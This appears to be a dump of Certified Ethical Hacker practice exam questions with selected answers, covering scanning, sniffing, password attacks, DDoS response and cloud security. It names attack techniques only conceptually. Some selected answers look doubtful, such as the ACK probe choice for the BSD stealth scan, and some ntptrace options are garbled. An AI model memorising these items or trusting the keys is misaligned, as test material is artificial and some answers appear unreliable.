Consider a scenario where a Certified Ethical Hacker is attempting to infiltrate a company’s network without being detected. The hacker intends to use a stealth scan on a BSD-derived TCP/IP stack, but he suspects that the network security devices may be able to detect SYN packets. Based on this information, which of the following methods should he use to bypass the detection mechanisms and why?
A. Maimon Scan, because it is very similar to NULL, FIN, and Xmas scans, but the probe used here is FIN/ACK
B. Xmas Scan, because it can pass through filters undetected, depending on the security mechanisms installed
C. TCP Connect/Full-Open Scan, because it completes a three-way handshake with the target machine
D. ACK Flag Probe Scan, because it exploits the vulnerabilities within the BSD-derived TCP/IP stack
Selected Answer: D
Question #: 228
Topic #: 1
In a large organization, a network security analyst discovered a series of packet captures that seem unusual. The network operates on a switched Ethernet environment. The security team suspects that an attacker might be using a sniffer tool. Which technique could the attacker be using to successfully carry out this attack, considering the switched nature of the network?
A. The attacker might be compromising physical security to plug into the network directly.
B. The attacker might be implementing MAC flooding to overwhelm the switch’s memory.
C. The attacker is probably using a Trojan horse with in-built sniffing capability.
D. The attacker might be using passive sniffing, as it provides significant stealth advantages.
Selected Answer: B
Question #: 224
Topic #: 1
An ethical hacker is preparing to scan a network to identify live systems. To increase the efficiency and accuracy of his scans, he is considering several different host discovery techniques. He expects several unused IP addresses at any given time, specifically within the private address range of the LAN, but he also anticipates the presence of restrictive firewalls that may conceal active devices. Which scanning method would be most effective in this situation?
A. ICMP ECHO Ping Sweep
B. ICMP Timestamp Ping
C. TCP SYN Ping
D. ARP Ping Scan
Selected Answer: D
Question #: 222
Topic #: 1
Being a Certified Ethical Hacker (CEH), a company has brought you on board to evaluate the safety measures in place for their network system. The company uses a network time protocol server in the demilitarized zone. During your enumeration, you decide to run a ntptrace command. Given the syntax: ntptrace [-n] [-m maxhosts] [servername/IP_address], which command usage would best serve your objective to find where the NTP server obtains the time from and to trace the list of NTP servers connected to the network?
A. ntptrace -n -m 5192.168.1.1
B. ntptrace -m 5192.168.1.1
C. ntptrace -n localhost
D. ntptrace 192.168.1.1
Selected Answer: D
Question #: 208
Topic #: 1
As a certified ethical hacker, you are performing a system hacking process for a company that is suspicious about its security system. You found that the company’s passwords are all known words, but not in the dictionary. You know that one employee always changes the password by just adding some numbers to the old password. Which attack is most likely to succeed in this scenario?
A. Brute-Force Attack
B. Password Spraying Attack
C. Hybrid Attack
D. Rule-based Attack
Selected Answer: C
Question #: 204
Topic #: 1
While working as an intern for a small business, you have been tasked with managing the company’s web server. The server is being bombarded with requests, and the company’s website is intermittently going offline. You suspect that this could be a Distributed Denial of Service (DDoS) attack. As an ethical hacker, which of the following steps would be your first course of action to mitigate the issue?
A. Contact your Internet Service Provider (ISP) for assistance
B. Install a newer version of the server software
C. Implement IP address whitelisting
D. Increase the server’s bandwidth
Selected Answer: A
Question #: 166
Topic #: 1
As a cybersecurity analyst for a large corporation, you are auditing the company’s mobile device management (MDM) policy. One of your areas of concern is data leakage from company-provided smartphones. You are worried about employees unintentionally installing malicious apps that could access sensitive corporate data on their devices. Which of the following would be an effective measure to prevent such data leakage?
A. Require biometric authentication for unlocking devices.
B. Regularly change Wi-Fi passwords used by the devices.
C. Mandate the use of VPNs when accessing corporate data.
D. Enforce a policy that only allows app installations from approved corporate app stores.
Selected Answer: D
Question #: 123
Topic #: 1
Which file is a rich target to discover the structure of a website during web-server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html
Selected Answer: B
Question #: 85
Topic #: 1
Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries.
Which of the following tiers of the container technology architecture is Abel currently working in?
A. Tier-1: Developer machines
B. Tier-2: Testing and accreditation systems
C. Tier-3: Registries
D. Tier-4: Orchestrators
Selected Answer: B
